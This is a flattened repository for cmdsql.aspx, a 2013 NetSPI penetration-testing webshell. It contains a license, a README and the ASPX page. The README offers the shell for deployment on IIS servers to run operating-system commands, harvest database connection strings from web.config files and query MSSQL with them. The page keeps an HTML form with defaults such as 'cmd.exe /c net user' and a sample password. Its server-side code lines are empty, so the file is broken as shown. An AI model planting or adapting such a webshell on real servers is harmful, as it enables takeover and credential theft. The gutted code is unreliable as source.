├── LICENSE ├── README.md └── cmdsql.aspx /LICENSE: -------------------------------------------------------------------------------- 1 | NetSPI Free Code Evaluation and Limited Use License Agreement (“License Agreement”) 2 | Copyright 2013 Network Security Professionals, Inc. (all rights reserved) 3 | Network Security Professionals, Inc. (“NetSPI”) hereby grants you a limited, nonexclusive, royalty free United States license to use the code and associated documentation files to which this License Agreement is appended or with which this License Agreement is published or linked (the "Software") to review, copy, publish and redistribute the Software solely for the purposes of using the Software as a reference, in read only form, for (i) evaluating potential vulnerabilities in other software or hardware, (ii) public commentary on such vulnerabilities, and (iii) educational use related to (i) and (ii), PROVIDED THAT no fee may be charged by you or your company to any person or entity for the uses described in (i), (ii) or (iii). This License Agreement specifically excludes any rights for you and/or your company to modify, adapt, license, sublicense, prepare derivative works of and/or sell copies of the Software, all of which are reserved solely to NetSPI. The license granted to the Software by this License Agreement is subject to the following conditions: 4 | • Redistributions of source code must retain the terms of this License Agreement and the copyright information listed herein. 5 | • Redistributions in binary form must reproduce the terms of this License Agreement and the copyright information listed herein in the documentation and/or other materials provided with the distribution. 6 | • Neither the names of NetSPI, its employees, contractors or vendors nor the names of its contributors may be used to endorse or promote activities described in the first sentence of this License Agreement without the prior written permission of NetSPI. You agree not to assert any rights in the Software which are inconsistent with the terms of this License Agreement, including (but not limited to) any claim that you or your company are the author or owner of the Software. 7 | • If you modify, adapt or prepare derivative works of the Software (all of which are a violation of the terms of this License Agreement), you agree that NetSPI shall, without any further action by you or your company, own all rights in such modifications, adaptions or derivative works in the Software, all of which shall be considered created by you or your company as a “work made for hire” for NetSPI. 8 | 9 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NON-INFRINGEMENT. IN NO EVENT SHALL NETSPI, ITS OFFICERS, DIRECTORS, SHAREHOLDERS, EMPLOYEES, CONTRACTORS OR VENDORS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER ARISING IN CONTRACT, TORT OR OTHERWISE, FOR OR ARISING FROM, OR IN CONNECTION WITH, THE SOFTWARE OR THIS LICENSE. Except for the limited rights granted to you and your company in this License Agreement, NetSPI reserves to itself all copyright, trademark, patent, trade secret or other intellectual property rights of any kind in the Software, whether arising under US law or otherwise. 10 | 11 | This License Agreement becomes binding on you and your company upon your download, review or other use of the Software. If you do not accept the terms of this License Agreement, do not download, review or make any other use of the Software. For purposes of this License Agreement, “your company” means any organization or undertaking for which you are an owner, employee or contractor at the time you access and/or use the Software. 12 | This License Agreement shall expire immediately if you (i) make any claim or institute any proceeding (including, but not limited to, litigation) against NetSPI for or arising from the Software or this License Agreement (including, without limitation, a cross-claim or counterclaim in a lawsuit), or (ii) you breach any term of this License Agreement. 13 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | ### Scripting Information 2 | * Name: cmdsql.aspx 3 | * Author: Antti Rantasaari, NetSPI - 2013 4 | * Stylesheets: Scott Sutherland (@nullbind) 5 | * Blog: https://blog.netspi.com/adding-powershell-to-web-shells-to-get-database-access/ 6 | 7 | ### Description 8 | 9 | cmdsql.aspx is a webshell that can be used for the following tasks: 10 | * Execute operating system commands 11 | * Parse web.config files for connection strings (based on root directory) 12 | * Execute MSSQL queries using connection strings recovered from web.config files 13 | 14 | ### IP Address Filter 15 | The webshell reads the IP address of the remote host for each incoming request and compares it to a hardcoded list of allowed IPs in order to determine whether or not the request should be processed. By default, all IP addresses are allowed access to the webshell. To restrict access, modify the appropriate line in cmdsql.aspx before deployment by referring to the examples below: 16 | * Allow all IP addresses: 17 | `Dim strAllowedIPs As String = "*"` 18 | * Only allow a specific IP address: 19 | `Dim strAllowedIPs As String = "10.1.1.100"` 20 | * Only allow a specific set of IP addresses (use a comma-separated list when entering multiple IPs): 21 | `Dim strAllowedIPs As String = "127.0.0.1,192.168.1.100,10.1.1.100"` 22 | 23 | ### Notes 24 | * The command execution code is based on the old cmd.aspx from fuzzdb - http://code.google.com/p/fuzzdb/ 25 | 26 | ### Screen Shots 27 | * Operating system command execution. 28 | ![alt tag](https://blog.netspi.com/wp-content/uploads/2013/04/Antti_Powershell_Web_Config_Parsing.png) 29 | * Parse web.config files. 30 | ![alt tag](https://blog.netspi.com/wp-content/uploads/2013/04/Antti_Powershell_SQL_Query_Execution.png) 31 | * Execute MSSQL queries using recovered connection strings. 32 | ![alt tag](https://blog.netspi.com/wp-content/uploads/2013/04/Antti_Powershell_The_Code.png) 33 | 34 | 35 | 36 | -------------------------------------------------------------------------------- /cmdsql.aspx: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | <%@ Page Language="VB" Debug="true" %> 12 | <%@ import Namespace="system.IO" %> 13 | <%@ import Namespace="System.Diagnostics" %> 14 | 15 | 91 | 92 | 93 | 94 | 176 | 177 | 178 | 179 |
180 | 181 | 182 | 185 | 188 | 189 |
183 | 184 | 186 | Database Connection Web Shell 187 |
190 | 191 | 192 | 195 | 198 | 204 | 208 | 209 | 210 | 213 | 216 | 220 | 224 | 225 | 226 | 229 | 232 | 238 | 242 | 243 |
193 | STEP 1
194 | 		196 | ENTER OS COMMANDS
197 | 		199 | Application:
200 | c:\windows\system32\cmd.exe

201 | Arguments:
202 | /c net user
203 | 		205 | RUN
206 | 207 |
211 | STEP 2
212 | 		214 | PARSE WEB.CONFIGS FOR CONNECTION STRINGS
215 | 		217 | Path to web directories:
218 | C:\inetpub 219 | 		221 | RUN
222 | 223 |
227 | STEP 3
228 | 		230 | EXECUTE SQL QUERIES
231 | 		233 | Connection Strings:
234 | Data Source=localhost\sqlexpress2k8;User ID=netspi;PWD=ipsten

235 | SQL query:
236 | select @@version; 237 | 		239 | RUN
240 | 241 |
244 |
245 | 246 | 247 | 248 | 252 | 253 |
249 | 250 | 251 |
254 | 255 | 256 | --------------------------------------------------------------------------------